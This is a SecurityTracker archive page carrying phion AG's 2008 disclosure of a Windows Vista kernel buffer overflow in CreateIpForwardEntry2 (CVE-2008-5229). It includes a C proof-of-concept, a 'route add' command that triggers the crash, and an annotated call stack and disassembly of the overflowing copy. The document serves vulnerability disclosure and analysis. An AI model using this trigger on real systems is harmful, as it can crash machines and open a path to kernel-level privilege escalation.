Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Windows Vista Buffer Overflow in CreateIpForwardEntry2() May Let Local Users Gain Elevated Privileges
|
|
SecurityTracker Alert ID: 1021245
|
|
SecurityTracker URL: http://securitytracker.com/id?1021245
|
|
CVE Reference: CVE-2008-5229
(Links to External Site)
|
Updated: Dec 1 2008
|
Original Entry Date: Nov 19 2008
|
Impact: Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): Vista SP1
|
Description: A vulnerability was reported in Windows Vista. Certain local users may be able to obtain elevated privileges on the target system.
A local user with Network Configuration Operators group privileges of Administrators group privileges can trigger a buffer overflow
in the TCP/IP stack to potentially execute arbitrary code on the target system with kernel level privileges.
A specially crafted
DestinationPrefix PrefixLength value in the CreateIpForwardEntry2 method can trigger the overflow.
The vendor was notified on
October 22, 2008.
Marius Wachtler, Michael Burgbacher, Carson Hounshell, Michael Craggs, and Thomas Unterleitner at phion AG
reported this vulnerability.
|
Impact: A local user with certain privileges may be able to obtain elevated privileges on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.microsoft.com/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Vista)
|
Reported By: Thomas Unterleitner <t.unterleitner@phion.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 19 Nov 2008 17:04:05 +0100
From: Thomas Unterleitner <t.unterleitner@phion.com>
Subject: Microsoft VISTA TCP/IP stack buffer overflow
|
phion Security Advisory 21/10/2008
Microsoft VISTA TCP/IP stack buffer overflow
Summary
-----------------------------
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64
bit contains a possibly exploitable,
buffer overflow corrupting kernel memory.
Affected Systems
-----------------------------
Using the sample program it was possible to verify this issue on following operating systems and conf
igurations:
* Microsoft Windows Vista Enterprise 32 bit & 64 bit
* Microsoft Windows Vista Ultimate 32 bit & 64 bit
It is very likely that other versions of Windows Vista are affected by this issue.
This issue did not occur on Windows XP.
Installation of Service Pack 1 and/or security updates had no effect in regards to resolve the random
crashes.
To execute either the sample program or the route-add command, the user has to be member of the Netwo
rk Configuration Operators group
or the Administrators group.
Since this buffer overflow overwrites kernel memory, it could be possible that members of the Network
Configuration Operator group
exploit this and take control over the operating system without any restriction.
Impact
-----------------------------
1. When adding a route entry to the IPv4 routing table using the method CreateIpForwardEntry2 and pas
sing an illegal value greater
than 32 [2] for the destination PrefixLength member in the DestinationPrefix structure contained in
the MIB_IPFORWARD_ROW2 structure
[3], kernel space memory is being corrupted resulting in random blue screen crashes. The crash does
not always occur instantly after
executing the provided sample program; it may take a while until the corrupted memory is accessed, c
ausing the operating system to
crash with a blue screen. It seems that larger illegal values [2] trigger the crash earlier, during
research in our labs it proved
that passing the illegal values 129 and 255 accelerates the occurrence of the crash.
2. In addition we were able to reproduce this issue without the sample program, using the built in "
route add" command. It seems the
"route-add" uses the same method as our sample program, hence creates the same buffer over
flow when calling it with an illegal value
for the network mask. The syntax we used in the command line is as follows:
route add 1.2.3.4/240 4.3.2.1
This buffer overflow could be exploited to inject code, hence compromising client security.
Remedy
------------
No remedy available from vendor as of November 10, 2008.
Workaround for netfence entegra 1.0 -1.2
---------------------------------------------------
For netfence entegra, phion recommends to use the following workaround:
Install the hotfix provided by phion AG, which is available to all customers and partners for downloa
d on the myphion site [4]. This
hotfix will replace the existing vista.dll in the phion installation directory, with the newer versi
on 1.0.0.1.
Reported
------------
This vulnerability was first reported to Microsoft on, 22nd October 2008 15:20 (GMT +2).
Acknowledgements
-----------------------------
This vulnerability has been discovered by Marius Wachtler, Michael Burgbacher, Carson Hounshell, Mich
ael Craggs and Thomas Unterleitner
on behalf of phion AG.
Contact Information
-----------------------------
phion AG can be reached via:
office@phion.com / http://www.phion.com
Thomas Unterleitner can be reached via:
t.unterleitner@phion.com
References
-----------------------------
[1] phion AG - http://www.phion.com/
[2] MSDN IP_ADDRESS_PREFIX structure - http://msdn.microsoft.com/en-us/library/aa814439(VS.85).aspx
[3] MSDN MIB_IPFORWARD_ROW2 - a http://msdn.microsoft.com/en- us/library/aa814494(VS.85).aspx
[4] Myphion - http://www.phion.com/INT/support/Myphion/Pages/default.aspx
Exploit
-----------------------------
See Appendix A for sample code and Appendix B for research results.
Disclaimer
-----------------------------
There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of
this information is at the user's
risk. In no event shall the author/distributor (phion AG) be held liable for any damages whatsoever
arising out of or in connection
with the use or spread of this information.
Appendix A - Sample source code
#define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv)
DWORD dwStatus;
MIB_IPFORWARD_ROW2 route;
if (argc != 3)
{
printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
return -1;
}
InitializeIpForwardEntry(&route);
route.InterfaceIndex = atoi(argv[1]);
route.DestinationPrefix.Prefix.si_family = AF_INET;
route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");
route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;
route.DestinationPrefix.PrefixLength = atoi(argv[2]);
route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
route.NextHop.Ipv4.sin_family = AF_INET;
route.SitePrefixLength = 0;
route.Protocol = MIB_IPPROTO_NETMGMT;
route.Origin = NlroManual;
route.ValidLifetime = 0xffffffff;
route.PreferredLifetime = 0xffffffff;
route.Metric = 1;
dwStatus = CreateIpForwardEntry2(&route);
return dwStatus;
Appendix B - Research results
After further research we where able to narrow down the issue
and can provide the reason and location of the buffer overflow.
======== Summary ========
The function netio!PtpCreateTrieNode allocates 32 bytes using
the method ExAllocatePoolWithTag, as a buffer. Next the function
netio!PtpCopyPartialKeys tries to copy memory into the previously
allocated buffer using an offset of 24 bytes and the illegal
value as number of bits to be copied. Since this value can be
bigger than 8 bytes the amount of memory copied is greater than
the buffer, overwriting surrounding kernel memory.
======== Parameters ========
CreateIpForwardEntry2 was called with
DestinationPrefix.Prefix = "1.2.3.4"
DestinationPrefix.PrefixLength = 0xEE
======== Callstack ========
934b7a00 85a1b1bb 00000020 837100ee 934b7ac4 NETIO!PtpCreateTrieNode+0x20
934b7a34 85a6211f 842f4ed0 934b7ac4 837100ee NETIO!PtInsertEntry+0x59
934b7a5c 85aa6fe4 00000000 934b7ac4 837100ee tcpip!IppCreateUnicastRoute+0xf0
934b7ae8 85a5d121 00000001 858b6278 84d74ce8 tcpip!IppValidateSetAllRouteParameters+0x217
934b7b64 85a18a29 836c134c 00000000 92a84a70 tcpip!Ipv4SetAllRouteParameters+0x1d1
934b7ba4 8a844551 00000001 92a326b4 00000000 NETIO!NsiSetAllParametersEx+0xbd
934b7bf0 8a844eb8 00000000 836c1330 836c1378 nsiproxy!NsippSetAllParameters+0x1b1
934b7c14 8a844f91 92a32601 00000000 8371d290 nsiproxy!NsippDispatchDeviceControl+0x88
934b7c2c 818f0053 8590b448 92a32698 92a32698 nsiproxy!NsippDispatch+0x33
934b7c44 81a80515 8371d290 92a32698 92a32708 nt!IofCallDriver+0x63
934b7c64 81a80cba 8590b448 8371d290 0027f700 nt!IopSynchronousServiceTail+0x1d9
934b7d00 81a6a98e 8590b448 92a32698 00000000 nt!IopXxxControlFile+0x6b7
934b7d34 8188ba7a 00000044 00000048 00000000 nt!NtDeviceIoControlFile+0x2a
934b7d34 77529a94 00000044 00000048 00000000 nt!KiFastCallEntry+0x12a
0027f68c 77528444 777214b9 00000044 00000048 ntdll!KiFastSystemCallRet
0027f690 777214b9 00000044 00000048 00000000 ntdll!ZwDeviceIoControlFile+0xc
======== Disassembly with commands ========
NETIO!PtpCreateTrieNode:
mov edi,edi
push ebp
mov ebp,esp
push edi
mov edi,dword ptr [ebp+8]
lea eax,[ebp+8]
push eax
push dword ptr [edi+4]
push 18h
call NETIO!RtlULongAdd (85a1675d)
test eax,eax
jl NETIO!PtpCreateTrieNode+0x1b
push esi
push 74704D4Eh
push dword ptr [ebp+8] ; = 0x00000020
push 0
call ExAllocatePoolWithTag ; eax = ExAllocatePoolWithTag(0, 0x20, 0x74704D4E, esi);
mov esi,eax ; = 0x83716380 allocated buffer address
test esi,esi
je NETIO!PtpCreateTrieNode+0x6d
push dword ptr [ebp+8] ; = 0x00000020
push 0
push esi ; 0x83716380 allocated buffer address
call NETIO!memset (85a10543) ; memset((char*)0x83716380, 0, 0x20)
mov eax,dword ptr [ebp+14h]
mov dword ptr [esi],eax
mov eax,dword ptr [ebp+18h]
mov dword ptr [esi+0Ch],eax
mov dword ptr [eax],esi
mov eax,dword ptr [ebp+0Ch]
and word ptr [esi+14h],0
add esp,0Ch
push eax ; = 0x837100ee
; the lower word contains our PrefixLength (0x00EE)
push dword ptr [ebp+10h] ; = 0x934b7ac4 contains our ip
; 934b7ac4 01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
; 934b7ad4 78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 8b 85
; 934b7ae4 b9 9a fb 16 64 7b 4b 93-21 d1 a5 85 01 00 00 00
mov word ptr [esi+16h],ax
lea eax,[esi+18h] ; esi unchanged, holds the alloc. buffer address (=0x83716380)
push eax ; = 0x83716398 add offset of 0x18 bytes to the allocated buffer
call NETIO!PtpCopyPartialKeys ; PtpCopyPartialKeys(0x83716380+0x18, 0x934b7ac4, PrefixLength)
inc dword ptr [edi+8]
mov eax,esi
pop esi
pop edi
pop ebp
ret 14h
nop
nop
nop
nop
nop
NETIO!PtpCopyPartialKeys:
mov edi,edi
push ebp
mov ebp,esp
movzx eax,word ptr [ebp+10h] ; = 0x00ee PrefixLength in bits
add eax,7
shr eax,3
push eax ; 0x0000001e PrefixLength in bytes
push dword ptr [ebp+0Ch] ; 0x934b7ac4 src buffer
push dword ptr [ebp+8] ; 0x83716398 dst buffer
; 83716398 00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
; 837163a8 01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; -------------------------------------------------------------
-----
call NETIO!memcpy ; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW
!!!!
; -------------------------------------------------------------
-----
; 83716398 01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
; 837163a8 78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; compare the byte values with the src buffer printed before
add esp,0Ch
pop ebp
ret 0Ch
neg ecx
push ecx
|
|
Go to the Top of This SecurityTracker Archive Page
|
